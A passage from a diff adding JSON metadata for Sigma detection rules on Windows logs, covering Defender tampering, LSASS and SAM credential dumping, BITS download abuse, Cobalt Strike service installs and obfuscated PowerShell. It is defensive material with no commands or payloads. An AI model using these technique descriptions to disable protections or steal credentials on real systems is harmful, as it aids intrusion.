"https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", + "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "49e5bc24-8b86-49f1-b743-535f332c2856", + "value": "Microsoft Defender Tamper Protection Trigger" + }, + { + "description": "Detects disabling Windows Defender threat protection", + "meta": { + "author": "Ján Trenčanský, frack113", + "creation_date": "2020/07/28", + "falsepositive": [ + "Administrator actions (should be investigated)" + ], + "filename": "win_defender_disabled.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "value": "Windows Defender Threat Detection Disabled" + }, + { + "description": "Detects Access to LSASS Process", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/26", + "falsepositive": [ + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" + ], + "filename": "win_defender_alert_lsass_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_alert_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "value": "LSASS Access Detected via Attack Surface Reduction" + }, + { + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/07/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_defender_psexec_wmi_asr.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands", + "https://twitter.com/duff22b/status/1280166329660497920", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" + ] + }, + "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "value": "PSExec and WMI Process Creations Block" + }, + { + "description": "Detects the Setting of Windows Defender Exclusions", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/07/06", + "falsepositive": [ + "Administrator actions" + ], + "filename": "win_defender_exclusions.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_nullbind/status/1204923340810543109", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exclusions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "value": "Windows Defender Exclusions Added" + }, + { + "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/13", + "falsepositive": [ + "Deletion of Defender malware detections history for legitimate reasons" + ], + "filename": "win_defender_history_delete.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", + "https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "2afe6582-e149-11ea-87d0-0242ac130003", + "value": "Windows Defender Malware Detection History Deletion" + }, + { + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_defender_exploit_guard_tamper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "value": "Windows Defender Exploit Guard Tamper" + }, + { + "description": "Detects triggering of AMSI by Windows Defender.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/09/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_defender_amsi_trigger.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_amsi_trigger.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "value": "Windows Defender AMSI Trigger Detected" + }, + { + "description": "Detects all actions taken by Windows Defender malware detection engines", + "meta": { + "author": "Ján Trenčanský", + "creation_date": "2020/07/28", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_defender_threat.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "value": "Windows Defender Threat Detected" + }, + { + "description": "Detects suspicious changes to the windows defender configuration", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/06", + "falsepositive": [ + "Administrator activity (must be investigated)" + ], + "filename": "win_defender_suspicious_features_tampering.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", + "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "value": "Windows Defender Suspicious Configuration Changes" + }, + { + "description": "Detects the restoration of files from the defender quarantine", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/06", + "falsepositive": [ + "Legitimate administrator activity restoring a file" + ], + "filename": "win_defender_restored_quarantine_file.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "value": "Win Defender Restored Quarantine File" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/01", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_local_file.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", + "value": "Suspicious Download File Extension with BITS" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/01", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_powershell_job.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_powershell_job.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", + "value": "Suspicious Task Added by Powershell" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/01", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_use_bitsadmin.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", + "value": "Suspicious Task Added by Bitsadmin" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "win_bits_client_susp_local_folder.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "value": "Download with BITS to Suspicious Folder" + }, + { + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "win_bits_client_susp_domain.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", + "value": "Suspicious Download with BITS from Suspicious TLD" + }, + { + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/10", + "falsepositive": [ + "Other legitimate domains used by software updaters" + ], + "filename": "win_bits_client_uncommon_domain.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", + "value": "Suspicious Uncommon Download with BITS from Suspicious TLD" + }, + { + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/29", + "falsepositive": [ + "Unknown" + ], + "filename": "win_terminalservices_rdp_ngrok.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://ngrok.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "value": "Ngrok Usage with Remote Desktop Service" + }, + { + "description": "This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/08", + "falsepositive": [ + "Unknown" + ], + "filename": "win_susp_dns_config.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", + "https://twitter.com/gentilkiwi/status/861641945944391680", + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_susp_dns_config.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "cbe51394-cd93-4473-b555-edf0144952d9", + "value": "DNS Server Error Failed Loading the ServerLevelPluginDLL" + }, + { + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "meta": { + "author": "Omer Faruk Celik", + "creation_date": "2018/03/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_hack_smbexec.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_hack_smbexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" + ] + }, + "uuid": "52a85084-6989-40c3-8f32-091e12e13f09", + "value": "smbexec.py Service Installation" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_stdin_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "487c7524-f892-4054-b263-8a0ace63fc25", + "value": "Invoke-Obfuscation Via Stdin - System" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Highly unlikely" + ], + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System" + }, + { + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_susp_double_ampersand.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "value": "New Service Uses Double Ampersand in Path" + }, + { + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_pcap_drivers.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_pcap_drivers.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "7b687634-ab20-11ea-bb37-0242ac130002", + "value": "Windows Pcap Drivers" + }, + { + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "meta": { + "author": "Connor Martin, Nasreddine Bencherchali", + "creation_date": "2022/12/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_remote_access_software.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_remote_access_software.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "1a31b18a-f00c-4061-9900-f735b96c99fc", + "value": "Remote Access Tool Services Have Been Installed - System" + }, + { + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_kdcsvc_rc4_downgrade.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "value": "KDC RC4-HMAC Downgrade CVE-2022-37966" + }, + { + "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/11", + "falsepositive": [ + "Legitimate usage of the anydesk tool" + ], + "filename": "win_system_service_install_anydesk.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_anydesk.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "530a6faa-ff3d-4022-b315-50828e77eef5", + "value": "Anydesk Remote Access Software Service Installation" + }, + { + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/22", + "falsepositive": [ + "Legitimate use of the tool" + ], + "filename": "win_system_service_install_pdqdeploy_runner.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "value": "New PDQDeploy Service - Client Side" + }, + { + "description": "Windows Update get some error Check if need a 0-days KB", + "meta": { + "author": "frack113", + "creation_date": "2021/12/04", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_system_update_error.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_system_update_error.yml" + ], + "tags": [ + "attack.impact", + "attack.resource_development", + "attack.t1584" + ] + }, + "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", + "value": "Windows Update Error" + }, + { + "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/08", + "falsepositive": [ + "Software installation", + "Software updates" + ], + "filename": "win_system_rare_service_installs.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rare_service_installs.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ] + }, + "uuid": "66bfef30-22a5-4fcd-ad44-8d81e60922ae", + "value": "Rare Service Installations" + }, + { + "description": "Detects PAExec service installation", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_service_install_paexec.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_paexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", + "value": "PAExec Service Installation" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_rundll_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_rundll32_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "value": "Invoke-Obfuscation Via Use Rundll32 - System" + }, + { + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_system_service_installation_by_unusal_client.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_system_service_installation_by_unusal_client.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "value": "Service Installed By Unusual Client - System" + }, + { + "description": "Detects powershell script installed as a Service", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_powershell_script_installed_as_service.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", + "value": "PowerShell Scripts Installed as Services" + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "meta": { + "author": "Florian Roth, Wojciech Lesicki", + "creation_date": "2021/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_cobaltstrike_service_installs.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://www.sans.org/webcasts/119395", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", + "value": "CobaltStrike Service Installations - System" + }, + { + "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/01/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_sam_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_sam_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "839dd1e8-eda8-4834-8145-01beeee33acd", + "value": "SAM Dump to AppData" + }, + { + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "meta": { + "author": "Dimitrios Slamaris", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_susp_dhcp_config.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "value": "DHCP Server Loaded the CallOut DLL" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_compress_services.yml", + "level": "medium", + 